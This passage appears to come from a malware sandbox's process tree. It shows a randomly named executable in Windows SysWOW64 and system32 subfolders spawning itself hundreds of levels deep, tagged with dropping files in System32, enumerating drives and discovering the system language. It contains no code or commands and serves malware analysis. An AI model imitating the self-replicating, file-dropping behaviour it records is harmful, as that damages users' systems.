        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        226⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        227⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        228⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        229⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:4504
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        230⤵
        Drops file in System32 directory
        
        PID:4516
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        231⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        232⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        233⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        234⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        235⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        236⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        237⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        238⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        239⤵
        Drops file in System32 directory
        
        PID:4632
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        240⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        241⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        242⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        243⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        244⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        245⤵
        System Location Discovery: System Language Discovery
        
        PID:4712
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        246⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        247⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        248⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        249⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        250⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        251⤵
        System Location Discovery: System Language Discovery
        
        PID:4788
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        252⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        253⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        254⤵
        Drops file in System32 directory
        
        PID:4824
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        255⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:4836
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        256⤵
        System Location Discovery: System Language Discovery
        
        PID:4848
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        257⤵
        Drops file in System32 directory
        
        PID:4860
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        258⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        259⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        260⤵
        System Location Discovery: System Language Discovery
        
        PID:4896
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        261⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        262⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        263⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        264⤵
        Enumerates connected drives
        
        PID:4956
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        265⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        266⤵
        Drops file in System32 directory
        
        PID:5000
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        267⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        268⤵
        Drops file in System32 directory
        
        PID:5024
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        269⤵
        System Location Discovery: System Language Discovery
        
        PID:5036
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        270⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        271⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        272⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        273⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        274⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        275⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        276⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        277⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        278⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        279⤵
        Enumerates connected drives
        
        PID:4916
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        280⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        281⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        282⤵
        System Location Discovery: System Language Discovery
        
        PID:4676
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        283⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        284⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        285⤵
        System Location Discovery: System Language Discovery
        
        PID:5164
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        286⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        287⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        288⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        289⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        290⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        291⤵
        System Location Discovery: System Language Discovery
        
        PID:5284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        292⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        293⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        294⤵
        Enumerates connected drives
        
        PID:5324
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        295⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        296⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        297⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        298⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        299⤵
        Enumerates connected drives
        
        PID:5384
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        300⤵
        Drops file in System32 directory
        
        PID:5396
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        301⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        302⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        303⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        304⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        305⤵
        Drops file in System32 directory
        
        PID:5460
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        306⤵
        System Location Discovery: System Language Discovery
        
        PID:5476
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        307⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        308⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        309⤵
        Enumerates connected drives
        
        PID:5512
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        310⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        311⤵
        
        PID:5536
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        312⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        313⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        314⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        315⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        316⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        317⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        318⤵
        System Location Discovery: System Language Discovery
        
        PID:5620
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        319⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        320⤵
        
        PID:5648
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        321⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        322⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        323⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        324⤵
        Drops file in System32 directory
        
        PID:5696
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        325⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        326⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        327⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        328⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        329⤵
        Drops file in System32 directory
        
        PID:5756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        330⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        331⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        332⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        333⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        334⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        335⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        336⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        337⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        338⤵
        System Location Discovery: System Language Discovery
        
        PID:5868
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        339⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        340⤵
        Enumerates connected drives
        
        PID:5892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        341⤵
        
        PID:5904
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        342⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        343⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        344⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        345⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        346⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        347⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        348⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        349⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        350⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        351⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        352⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        353⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        354⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        355⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        356⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        357⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        358⤵
        Drops file in System32 directory
        
        PID:5416
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        359⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        360⤵
        System Location Discovery: System Language Discovery
        
        PID:5932
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        361⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        362⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        363⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        364⤵
        Drops file in System32 directory
        
        PID:2196
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        365⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        366⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        367⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        368⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        369⤵
        
        PID:6156
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        370⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        371⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        372⤵
        
        PID:6232
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        373⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        374⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        375⤵
        
        PID:6316
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        376⤵
        
        PID:6332
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        377⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        378⤵
        System Location Discovery: System Language Discovery
        
        PID:6412
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        379⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        380⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        381⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        382⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        383⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        384⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        385⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        386⤵
        Enumerates connected drives
        
        PID:7912
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        387⤵
        
        PID:8576
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        388⤵
        
        PID:9396
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        389⤵
        
        PID:10640
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        390⤵
        
        PID:13620
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        188⤵
        
        PID:15988
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        187⤵
        
        PID:15952
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        186⤵
        
        PID:15808
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        185⤵
        
        PID:15796
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        184⤵
        
        PID:15732
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
